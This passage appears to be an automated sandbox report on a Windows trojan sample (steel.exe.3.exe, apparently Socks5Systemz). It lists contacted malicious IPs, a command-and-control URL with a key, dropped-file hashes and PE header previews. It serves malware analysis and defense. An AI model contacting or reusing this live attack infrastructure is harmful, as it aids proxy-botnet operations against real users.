                                    https://188.119.66.185/A654B8DF3C4585F17B60DA6690D18421A0182C8mediacodecpack3.exe, 00000002.00000002.2982383221.000000000335A000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://188.119.66.185/ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4mediacodecpack3.exe, 00000002.00000002.2982383221.000000000335A000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: malware
                                    unknown
                                    http://www.remobjects.com/pssteel.exe.3.exe, 00000000.00000003.1732080677.0000000002168000.00000004.00001000.00020000.00000000.sdmp, steel.exe.3.exe, 00000000.00000003.1731820756.00000000023D0000.00000004.00001000.00020000.00000000.sdmp, steel.exe.3.tmp, steel.exe.3.tmp, 00000001.00000000.1732720470.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-67S07.tmp.1.dr, steel.exe.3.tmp.0.drfalse
                                      high
                                      https://www.easycutstudio.com/support.htmlsteel.exe.3.exe, 00000000.00000003.1731421977.00000000023D0000.00000004.00001000.00020000.00000000.sdmp, steel.exe.3.exe, 00000000.00000002.2980863339.0000000002161000.00000004.00001000.00020000.00000000.sdmp, steel.exe.3.exe, 00000000.00000003.1731515225.0000000002161000.00000004.00001000.00020000.00000000.sdmp, steel.exe.3.tmp, 00000001.00000003.1733523612.0000000003130000.00000004.00001000.00020000.00000000.sdmp, steel.exe.3.tmp, 00000001.00000003.1733603131.0000000002138000.00000004.00001000.00020000.00000000.sdmp, steel.exe.3.tmp, 00000001.00000002.2981234148.0000000002138000.00000004.00001000.00020000.00000000.sdmp, steel.exe.3.tmp, 00000001.00000002.2980978072.00000000005A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs
                                        IPDomainCountryFlagASNASN NameMalicious
                                        46.8.225.74
                                        unknownRussian Federation
                                        28917FIORD-ASIP-transitoperatorinRussiaUkraineandBalticsfalse
                                        188.119.66.185
                                        unknownRussian Federation
                                        209499FLYNETRUfalse
                                        Joe Sandbox version:41.0.0 Charoite
                                        Analysis ID:1577455
                                        Start date and time:2024-12-18 13:43:05 +01:00
                                        Joe Sandbox product:CloudBasic
                                        Overall analysis duration:0h 6m 27s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                        Number of analysed new started processes analysed:7
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Sample name:steel.exe.3.exe
                                        Detection:MAL
                                        Classification:mal92.troj.evad.winEXE@5/26@0/2
                                        EGA Information:
                                        • Successful, ratio: 100%
                                        HCA Information:
                                        • Successful, ratio: 92%
                                        • Number of executed functions: 193
                                        • Number of non-executed functions: 273
                                        Cookbook Comments:
                                        • Found application associated with file extension: .exe
                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                        • Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.63
                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                        • VT rate limit hit for: steel.exe.3.exe
                                        TimeTypeDescription
                                        07:44:37API Interceptor461270x Sleep call for process: mediacodecpack3.exe modified
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        46.8.225.74AbC0LBkVhr.exeGet hashmaliciousSocks5SystemzBrowse
                                          KRdh0OaXqH.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                            AGcC2uK0El.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                              6hvZpn91O8.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                j9htknb7BQ.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                  188.119.66.185Oz2UhFBTHy.exeGet hashmaliciousSocks5SystemzBrowse
                                                    GEm3o8pION.exeGet hashmaliciousSocks5SystemzBrowse
                                                      GEm3o8pION.exeGet hashmaliciousSocks5SystemzBrowse
                                                        bzX2pV3Ybw.exeGet hashmaliciousSocks5SystemzBrowse
                                                          bzX2pV3Ybw.exeGet hashmaliciousSocks5SystemzBrowse
                                                            Ni2ghr9eUJ.exeGet hashmaliciousSocks5SystemzBrowse
                                                              Ni2ghr9eUJ.exeGet hashmaliciousSocks5SystemzBrowse
                                                                2mtt3zE6Vh.exeGet hashmaliciousSocks5SystemzBrowse
                                                                  2mtt3zE6Vh.exeGet hashmaliciousSocks5SystemzBrowse
                                                                    7i6bUvYZ4L.exeGet hashmaliciousSocks5SystemzBrowse
                                                                      No context
                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      FIORD-ASIP-transitoperatorinRussiaUkraineandBalticsAbC0LBkVhr.exeGet hashmaliciousSocks5SystemzBrowse
                                                                      • 46.8.225.74
                                                                      KRdh0OaXqH.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                      • 46.8.225.74
                                                                      AGcC2uK0El.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                      • 46.8.225.74
                                                                      6hvZpn91O8.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                      • 46.8.225.74
                                                                      j9htknb7BQ.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                      • 46.8.225.74
                                                                      b3astmode.arm5.elfGet hashmaliciousMiraiBrowse
                                                                      • 109.248.108.147
                                                                      reduce.exeGet hashmaliciousGO BackdoorBrowse
                                                                      • 46.8.236.61
                                                                      InsertSr.exeGet hashmaliciousGO BackdoorBrowse
                                                                      • 46.8.236.61
                                                                      iKhdG3bwZK.exeGet hashmaliciousGO BackdoorBrowse
                                                                      • 46.8.236.61
                                                                      ppc.elfGet hashmaliciousMiraiBrowse
                                                                      • 46.8.228.104
                                                                      FLYNETRUOz2UhFBTHy.exeGet hashmaliciousSocks5SystemzBrowse
                                                                      • 188.119.66.185
                                                                      GEm3o8pION.exeGet hashmaliciousSocks5SystemzBrowse
                                                                      • 188.119.66.185
                                                                      GEm3o8pION.exeGet hashmaliciousSocks5SystemzBrowse
                                                                      • 188.119.66.185
                                                                      bzX2pV3Ybw.exeGet hashmaliciousSocks5SystemzBrowse
                                                                      • 188.119.66.185
                                                                      bzX2pV3Ybw.exeGet hashmaliciousSocks5SystemzBrowse
                                                                      • 188.119.66.185
                                                                      Ni2ghr9eUJ.exeGet hashmaliciousSocks5SystemzBrowse
                                                                      • 188.119.66.185
                                                                      Ni2ghr9eUJ.exeGet hashmaliciousSocks5SystemzBrowse
                                                                      • 188.119.66.185
                                                                      2mtt3zE6Vh.exeGet hashmaliciousSocks5SystemzBrowse
                                                                      • 188.119.66.185
                                                                      2mtt3zE6Vh.exeGet hashmaliciousSocks5SystemzBrowse
                                                                      • 188.119.66.185
                                                                      7i6bUvYZ4L.exeGet hashmaliciousSocks5SystemzBrowse
                                                                      • 188.119.66.185
                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      51c64c77e60f3980eea90869b68c58a8cd#U9988.exeGet hashmaliciousUnknownBrowse
                                                                      • 188.119.66.185
                                                                      Oz2UhFBTHy.exeGet hashmaliciousSocks5SystemzBrowse
                                                                      • 188.119.66.185
                                                                      GEm3o8pION.exeGet hashmaliciousSocks5SystemzBrowse
                                                                      • 188.119.66.185
                                                                      GEm3o8pION.exeGet hashmaliciousSocks5SystemzBrowse
                                                                      • 188.119.66.185
                                                                      bzX2pV3Ybw.exeGet hashmaliciousSocks5SystemzBrowse
                                                                      • 188.119.66.185
                                                                      bzX2pV3Ybw.exeGet hashmaliciousSocks5SystemzBrowse
                                                                      • 188.119.66.185
                                                                      Ni2ghr9eUJ.exeGet hashmaliciousSocks5SystemzBrowse
                                                                      • 188.119.66.185
                                                                      Ni2ghr9eUJ.exeGet hashmaliciousSocks5SystemzBrowse
                                                                      • 188.119.66.185
                                                                      2mtt3zE6Vh.exeGet hashmaliciousSocks5SystemzBrowse
                                                                      • 188.119.66.185
                                                                      2mtt3zE6Vh.exeGet hashmaliciousSocks5SystemzBrowse
                                                                      • 188.119.66.185
                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      C:\ProgramData\MediaCodecPack\sqlite3.dllAbC0LBkVhr.exeGet hashmaliciousSocks5SystemzBrowse
                                                                        Oz2UhFBTHy.exeGet hashmaliciousSocks5SystemzBrowse
                                                                          GEm3o8pION.exeGet hashmaliciousSocks5SystemzBrowse
                                                                            GEm3o8pION.exeGet hashmaliciousSocks5SystemzBrowse
                                                                              bzX2pV3Ybw.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                bzX2pV3Ybw.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                  Ni2ghr9eUJ.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                    Ni2ghr9eUJ.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                      2mtt3zE6Vh.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                        2mtt3zE6Vh.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                          Process:C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe
                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):3186888
                                                                                          Entropy (8bit):6.230475147166178
                                                                                          Encrypted:false
                                                                                          SSDEEP:49152:5YOSeerrANJi8JBsNkPB4jnCViGF1awdEYO:SVeevAb/2kZ4jGiGFdO
                                                                                          MD5:1BADA3AB49364C26DA68D41031611AC7
                                                                                          SHA1:5BBB3CA5C6CED071A4297E0DB6C8AA96B16FA96B
                                                                                          SHA-256:F8A65D51ACF7D271F7BA0114366234DCE29BE27CFB73CA94AF990EC379350149
                                                                                          SHA-512:CFA982246856746524ECF44D45F5697B52DC6E90A828625697116B856CB7B51080562607EB89910216D18C8C13E2AED2AAAD65C58F66DEE3B6CDB79405C36701
                                                                                          Malicious:true
                                                                                          Yara Hits:
                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\MediaCodecPack\MediaCodecPack.exe, Author: Joe Security
                                                                                          Antivirus:
                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                          Reputation:low
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................PE..L.....bg.................j...D.......#............@...........................1.......1.....................................4........ ..0...............................................................................\............................aitt5...h.......j.................. ..`.ajtt5...-...........n..............@..@.aktt5...d.......0..................@....rsrc........ ......................@..@.altt5...&.......$...|..............`./.........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):645592
                                                                                          Entropy (8bit):6.50414583238337
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:i0zrcH2F3OfwjtWvuFEmhx0Cj37670jwX+E7tFKm0qTYh:iJUOfwh8u9hx0D70NE7tFTYh
                                                                                          MD5:E477A96C8F2B18D6B5C27BDE49C990BF
                                                                                          SHA1:E980C9BF41330D1E5BD04556DB4646A0210F7409
                                                                                          SHA-256:16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
                                                                                          SHA-512:335A86268E7C0E568B1C30981EC644E6CD332E66F96D2551B58A82515316693C1859D87B4F4B7310CF1AC386CEE671580FDD999C3BCB23ACF2C2282C01C8798C
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Joe Sandbox View:
                                                                                          • Filename: AbC0LBkVhr.exe, Detection: malicious, Browse
                                                                                          • Filename: Oz2UhFBTHy.exe, Detection: malicious, Browse
                                                                                          • Filename: GEm3o8pION.exe, Detection: malicious, Browse
                                                                                          • Filename: GEm3o8pION.exe, Detection: malicious, Browse
                                                                                          • Filename: bzX2pV3Ybw.exe, Detection: malicious, Browse
                                                                                          • Filename: bzX2pV3Ybw.exe, Detection: malicious, Browse
                                                                                          • Filename: Ni2ghr9eUJ.exe, Detection: malicious, Browse
                                                                                          • Filename: Ni2ghr9eUJ.exe, Detection: malicious, Browse
                                                                                          • Filename: 2mtt3zE6Vh.exe, Detection: malicious, Browse
                                                                                          • Filename: 2mtt3zE6Vh.exe, Detection: malicious, Browse
                                                                                          Reputation:high, very likely benign file
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....=S.v..?......!................X..............`......................... ......8......... .................................L................................'......................................................p............................text...............................`.0`.data...............................@.@..rdata..$...........................@.@@.bss..................................@..edata..............................@.0@.idata..L...........................@.0..CRT................................@.0..tls.... ...........................@.0..reloc...'.......(..................@.0B/4......`....0......................@.@B/19..........@......................@..B/35.....M....P......................@..B/51.....`C...`...D..................@..B/63..................8..............@..B/77..................F..............@..B/89..................R..
                                                                                          Process:C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe
                                                                                          File Type:ISO-8859 text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):8
                                                                                          Entropy (8bit):2.0
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:1/ll:1X
                                                                                          MD5:16F53EB40A5CB727DC7793ABC24F0063
                                                                                          SHA1:F7B6FF4E0F58E3DC9CF59175867507A2F5D8635F
                                                                                          SHA-256:86E21BEF56B5100688B23F55EE134E8A5C4A3F3927795EDBD3447F6DFC55E312
                                                                                          SHA-512:D99656AFDF7B176E3641B30D4D8FC2A169A827BA1056991024C3ED17F2F3B3528BC02623D0E6E65D5E58148E5D3D401EA02E03B3FD20AD33B1D13FD71172B82E
                                                                                          Malicious:false
                                                                                          Reputation:low
                                                                                          Preview:..bg....
                                                                                          Process:C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):4
                                                                                          Entropy (8bit):0.8112781244591328
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Xln:1
                                                                                          MD5:ED69DFADEF68FC181AAE2D22715A01D6
                                                                                          SHA1:3A9981C3761721792B7702231583758AE5ACF8A7
                                                                                          SHA-256:3EF3BD3D6658C0DFDFDD7AA65E3D92BF1DA9A04678A4ED2A5D84ED824EC91775
                                                                                          SHA-512:B70AF13C96AC7C3AC97C84F9EFC1F38794B190635AB602CE35C8572B9C3597DD1A4ABBFFCCB3AD8AE76CDB247C221168F2D45B7225A56444FF445937921FC318
                                                                                          Malicious:false
                                                                                          Reputation:low
                                                                                          Preview:....
                                                                                          Process:C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):128
                                                                                          Entropy (8bit):2.9012093522336393
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:ObXXXd0AbDBdUBWetxt:Or9Lb3UFx
                                                                                          MD5:679DD163372163CD8FFC24E3C9E758B3
                                                                                          SHA1:F307C14CA65810C8D0238B89B49B2ACD7C5B233B
                                                                                          SHA-256:510EA89D00FA427C33BD67AEEA60D21066976F085959C2AFE1F69411A8CA722D
                                                                                          SHA-512:46C464F15BCE39E28DCD48AF36C424845631D2B48D7E37D7FBBBEE0BC4DF32445A2810E397BF29FCA76C0364B1AA30CC05DCF4D9E799C6C697B49A174560969C
                                                                                          Malicious:false
                                                                                          Reputation:moderate, very likely benign file
                                                                                          Preview:12b48997735ce8b4537cf99be74bb62f518d3799011c89eb7c719048e83fac56................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):1645320
                                                                                          Entropy (8bit):6.787752063353702
                                                                                          Encrypted:false
                                                                                          SSDEEP:24576:Fk18V2mHkfIE3Ip9vkWEgDecZV3W9kpOuRw8RhWd5Ixwzr6lOboU7j97S9D+z98v:FZNkf+uW3D1ZVG9kVw8I5Rv6lwH9+X
                                                                                          MD5:871C903A90C45CA08A9D42803916C3F7
                                                                                          SHA1:D962A12BC15BFB4C505BB63F603CA211588958DB
                                                                                          SHA-256:F1DA32183B3DA19F75FA4EF0974A64895266B16D119BBB1DA9FE63867DBA0645
                                                                                          SHA-512:985B0B8B5E3D96ACFD0514676D9F0C5D2D8F11E31F01ACFA0F7DA9AF3568E12343CA77F541F55EDDA6A0E5C14FE733BDA5DC1C10BB170D40D15B7A60AD000145
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s...7o..7o..7o...L..<o..7o..en...L..$o...L...o...L..6o...L..6o...L..(n...L..6o..Rich7o..................PE..L.....D@...........!.........`.......Q.......`.....p................................................................l...CN..|...x....p...........................s.....8...............................................0............................text...n........................... ..`.data...X...........................@...Shared.......`.......P..............@....rsrc........p... ...`..............@..@.reloc...s..........................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):348160
                                                                                          Entropy (8bit):6.542655141037356
                                                                                          Encrypted:false
                                                                                          SSDEEP:6144:OcV9z83OtqxnEYmt3NEnvfF+Tbmbw6An8FMciFMNrb3YgxxpbCAOxO2ElvlE:Ooz83OtIEzW+/m/AyF7bCrO/E
                                                                                          MD5:86F1895AE8C5E8B17D99ECE768A70732
                                                                                          SHA1:D5502A1D00787D68F548DDEEBBDE1ECA5E2B38CA
                                                                                          SHA-256:8094AF5EE310714CAEBCCAEEE7769FFB08048503BA478B879EDFEF5F1A24FEFE
                                                                                          SHA-512:3B7CE2B67056B6E005472B73447D2226677A8CADAE70428873F7EFA5ED11A3B3DBF6B1A42C5B05B1F2B1D8E06FF50DFC6532F043AF8452ED87687EEFBF1791DA
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........2..S..S..S..Tp..S..S..5S..BX..S..BX...S..BX..Q..BX..S..BX..S..BX..S..Rich.S..........................PE..L.....V>...........!................."............4|.........................`......................................t....C......(.... .......................0..d+..H...8...........................x...H...............l............................text............................... ..`.rdata..@...........................@..@.data... h.......`..................@....rsrc........ ......................@..@.reloc..d+...0...0... ..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):645592
                                                                                          Entropy (8bit):6.50414583238337
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:i0zrcH2F3OfwjtWvuFEmhx0Cj37670jwX+E7tFKm0qTYh:iJUOfwh8u9hx0D70NE7tFTYh
                                                                                          MD5:E477A96C8F2B18D6B5C27BDE49C990BF
                                                                                          SHA1:E980C9BF41330D1E5BD04556DB4646A0210F7409
                                                                                          SHA-256:16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
                                                                                          SHA-512:335A86268E7C0E568B1C30981EC644E6CD332E66F96D2551B58A82515316693C1859D87B4F4B7310CF1AC386CEE671580FDD999C3BCB23ACF2C2282C01C8798C
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....=S.v..?......!................X..............`......................... ......8......... .................................L................................'......................................................p............................text...............................`.0`.data...............................@.@..rdata..$...........................@.@@.bss..................................@..edata..............................@.0@.idata..L...........................@.0..CRT................................@.0..tls.... ...........................@.0..reloc...'.......(..................@.0B/4......`....0......................@.@B/19..........@......................@..B/35.....M....P......................@..B/51.....`C...`...D..................@..B/63..................8..............@..B/77..................F..............@..B/89..................R..
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):499712
                                                                                          Entropy (8bit):6.414789978441117
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:fJzxYPVsBnxO/R7krZhUgiW6QR7t5k3Ooc8iHkC2eq:fZxvBnxOJ7ki3Ooc8iHkC2e
                                                                                          MD5:561FA2ABB31DFA8FAB762145F81667C2
                                                                                          SHA1:C8CCB04EEDAC821A13FAE314A2435192860C72B8
                                                                                          SHA-256:DF96156F6A548FD6FE5672918DE5AE4509D3C810A57BFFD2A91DE45A3ED5B23B
                                                                                          SHA-512:7D960AA8E3CCE22D63A6723D7F00C195DE7DE83B877ECA126E339E2D8CC9859E813E05C5C0A5671A75BB717243E9295FD13E5E17D8C6660EB59F5BAEE63A7C43
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............................................................................Rich...................PE..L.....w>...........!.................-............:|................................~e..............................$...?...d!..<....`.......................p...0..8...8...............................H............................................text............................... ..`.rdata..2*.......0..................@..@.data...h!...0... ...0..............@....rsrc........`.......P..............@..@.reloc...0...p...@...`..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp
                                                                                          File Type:MS Windows HtmlHelp Data
                                                                                          Category:dropped
                                                                                          Size (bytes):78183
                                                                                          Entropy (8bit):7.692742945771669
                                                                                          Encrypted:false
                                                                                          SSDEEP:1536:Bkt2SjEQ3r94YqwyadpL1X6Dtn4afF1VowWb8ZmmUQNk3gNqCLbMsFxJse8hbpmn:mR/CYj9dp5XIyI2b/mY3gNjLbMsOaP
                                                                                          MD5:B1B9E6D43319F6D4E52ED858C5726A97
                                                                                          SHA1:5033047A30CCCF57783C600FD76A6D220021B19D
                                                                                          SHA-256:8003A4A0F9F5DFB62BEFBF81F8C05894B0C1F987ACFC8654A6C6CE02B6213910
                                                                                          SHA-512:E56D6EC9170DEBAC28BB514942F794F73D4C194D04C54EFF9227B6EE3C74BA4FCF239FFF0BB6556DC8B847FA89D382AF206A2C481C41A3510936B0A74192D2C2
                                                                                          Malicious:false
                                                                                          Preview:ITSF....`..........E.......|.{.......".....|.{......."..`...............x.......T.......................g1..............ITSP....T...........................................j..].!......."..T...............PMGLW................/..../#IDXHDR...F.../#ITBITS..../#IVB...N$./#STRINGS.....P./#SYSTEM..N.'./#TOPICS...F.0./#URLSTR...:.t./#URLTBL...v.D./$FIftiMain......1./$OBJINST...z.../$WWAssociativeLinks/..../$WWAssociativeLinks/Property...v../$WWKeywordLinks/..../$WWKeywordLinks/Property...r../After.jpg...4..../Auto-.hhc...^./Auto-Adjustment.htm....?./Auto-BleachTeeth.htm...z.3./Auto-Crop2Plus.htm..U.j./Auto-Emphasis.htm...w.V./Auto-EyeColor.htm...!.../Auto-EyePencil.htm..._.../Auto-EyeShadow.htm...,.3./Auto-GettingStarted.htm....Q./Auto-Lipstick.htm..R.M./Auto-Liquify.htm...-.v./Auto-Menu.htm..S.r./Auto-OrderingInformation.htm...Q.../Auto-Overview.htm..^.$./Auto-Powder.htm......./Auto-Resize.htm..s.b./Auto-Rotation.htm..?.e./Auto-Rouge.htm...=.d./Auto-SkinCare.htm...|.{./Auto-SmartPatchCosmet
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):1645320
                                                                                          Entropy (8bit):6.787752063353702
                                                                                          Encrypted:false
                                                                                          SSDEEP:24576:Fk18V2mHkfIE3Ip9vkWEgDecZV3W9kpOuRw8RhWd5Ixwzr6lOboU7j97S9D+z98v:FZNkf+uW3D1ZVG9kVw8I5Rv6lwH9+X
                                                                                          MD5:871C903A90C45CA08A9D42803916C3F7
                                                                                          SHA1:D962A12BC15BFB4C505BB63F603CA211588958DB
                                                                                          SHA-256:F1DA32183B3DA19F75FA4EF0974A64895266B16D119BBB1DA9FE63867DBA0645
                                                                                          SHA-512:985B0B8B5E3D96ACFD0514676D9F0C5D2D8F11E31F01ACFA0F7DA9AF3568E12343CA77F541F55EDDA6A0E5C14FE733BDA5DC1C10BB170D40D15B7A60AD000145
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s...7o..7o..7o...L..<o..7o..en...L..$o...L...o...L..6o...L..6o...L..(n...L..6o..Rich7o..................PE..L.....D@...........!.........`.......Q.......`.....p................................................................l...CN..|...x....p...........................s.....8...............................................0............................text...n........................... ..`.data...X...........................@...Shared.......`.......P..............@....rsrc........p... ...`..............@..@.reloc...s..........................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):176128
                                                                                          Entropy (8bit):6.204917493416147
                                                                                          Encrypted:false
                                                                                          SSDEEP:3072:l9iEoC1+7N9UQV2Mi8NTUU3/EO3h3E9y6GeoPRtsoWhi75MUbvSHQ:l+ssU62Mi8x9P/UVGeQRthMUbvS
                                                                                          MD5:FEC4FF0C2967A05543747E8D552CF9DF
                                                                                          SHA1:B4449DC0DF8C0AFCC9F32776384A6F5B5CEDE20C
                                                                                          SHA-256:5374148EBCF4B456F8711516A58C9A007A393CA88F3D9759041F691E4343C7D6
                                                                                          SHA-512:93E3F48CD393314178CBC86F6142D577D5EAAE52B47C4D947DBA4DFB706860B150FF5B0E546CB83114CA44666E9DF6021964D79D064B775A58698DAA9550EF13
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+0.J^..J^..J^.cE...J^..VR..J^..UU..J^.#VP..J^..UT..J^..UZ..J^..kU..J^..kZ..J^..J_..J^..iT..J^..io..J^.gLX..J^._jZ..J^.Rich.J^.................PE..L.....L...........!.....0...@.......'.......@...................................................................... e..k....X..d....`.......................p..p....................................................@...............................text....".......0.................. ..`.rdata...%...@...0...@..............@..@.data...T....p... ...p..............@....rsrc........`......................@..@.reloc.......p......................@..B........................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):3186888
                                                                                          Entropy (8bit):6.230474684772782
                                                                                          Encrypted:false
                                                                                          SSDEEP:49152:MYOSeerrANJi8JBsNkPB4jnCViGF1awdEYO:lVeevAb/2kZ4jGiGFdO
                                                                                          MD5:E83CE4636B3E2DB208D20BF34F505D15
                                                                                          SHA1:B4AC7F4F9430B766EFCAC3226F88DBA886F8187D
                                                                                          SHA-256:7A5B7EB1FD83DC074CFB64F5E1B44CCABFA7C9B56070161FAE8CA382A43C54CE
                                                                                          SHA-512:437011046262723E831819FA037EFD4FA6BED1D8B976D3D60080FD1E926B70E431464B7212DAFD88801ED0FDD4934B37C509DC2C675F674DF7EF9E9B82546D2C
                                                                                          Malicious:false
                                                                                          Yara Hits:
                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\is-VED6B.tmp, Author: Joe Security
                                                                                          Preview:.Z......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................PE..L.....bg.................j...D.......#............@...........................1.......1.....................................4........ ..0...............................................................................\............................aitt5...h.......j.................. ..`.ajtt5...-...........n..............@..@.aktt5...d.......0..................@....rsrc........ ......................@..@.altt5...&.......$...|..............`./.........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp
                                                                                          File Type:MS Windows HtmlHelp Data
                                                                                          Category:dropped
                                                                                          Size (bytes):78183
                                                                                          Entropy (8bit):7.692742945771669
                                                                                          Encrypted:false
